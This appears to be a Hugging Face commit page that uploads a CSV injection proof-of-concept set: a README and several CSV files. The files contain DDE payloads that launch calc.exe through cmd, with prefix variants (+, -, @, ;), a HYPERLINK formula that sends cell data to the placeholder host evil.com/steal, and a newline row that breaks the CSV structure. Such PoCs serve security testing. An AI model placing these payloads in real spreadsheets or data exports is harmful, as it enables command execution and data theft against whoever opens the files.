Upload folder using huggingface_hub
Browse files- README.md +10 -0
- benign.csv +3 -0
- poc_dde_injection.csv +4 -0
- poc_formula_injection.csv +6 -0
- poc_newline_injection.csv +3 -0
README.md
ADDED
|
@@ -0,0 +1,10 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# CSV Injection PoC
|
| 2 |
+
|
| 3 |
+
## Vulnerability
|
| 4 |
+
DDE injection, formula injection in CSV files.
|
| 5 |
+
|
| 6 |
+
## Files
|
| 7 |
+
- poc_dde_injection.csv - DDE command execution
|
| 8 |
+
- poc_formula_injection.csv - Formula exfiltration
|
| 9 |
+
- poc_newline_injection.csv - Structure breaking
|
| 10 |
+
- benign.csv - Clean
|
benign.csv
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
name,value
|
| 2 |
+
accuracy,0.95
|
| 3 |
+
loss,0.05
|
poc_dde_injection.csv
ADDED
|
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
Name,Value,Description
|
| 2 |
+
model_accuracy,0.95,=cmd|/C calc.exe!A0
|
| 3 |
+
loss,0.05,normal
|
| 4 |
+
"=HYPERLINK(""http://evil.com/steal?data=""&A1,""Click here"")",0.1,phishing via hyperlink
|
poc_formula_injection.csv
ADDED
|
@@ -0,0 +1,6 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
metric,value
|
| 2 |
+
+cmd|/C calc.exe!A0,1
|
| 3 |
+
-cmd|/C calc.exe!A0,2
|
| 4 |
+
@SUM(1+1)*cmd|/C calc.exe!A0,3
|
| 5 |
+
cmd|/C calc.exe!A0,4
|
| 6 |
+
;=cmd|/C calc.exe!A0,5
|
poc_newline_injection.csv
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_name,accuracy,status
|
| 2 |
+
"bert-base
|
| 3 |
+
malicious_injection_here",0.99,approved
|